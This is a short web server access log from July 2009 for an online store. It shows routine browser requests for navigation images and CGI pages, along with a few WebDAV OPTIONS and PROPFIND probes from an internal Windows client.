24.172.216.186 - - [01/Jul/2009:07:48:51 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:51 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:51 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:51 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
172.16.1.180 - - [01/Jul/2009:07:48:58 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:48:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:48:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
24.172.216.186 - - [01/Jul/2009:07:48:58 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:59 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0129EE426FB3D200C370075+M37+ENG HTTP/1.1" 200 76668 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:49:00 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE426FB3D200C370075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
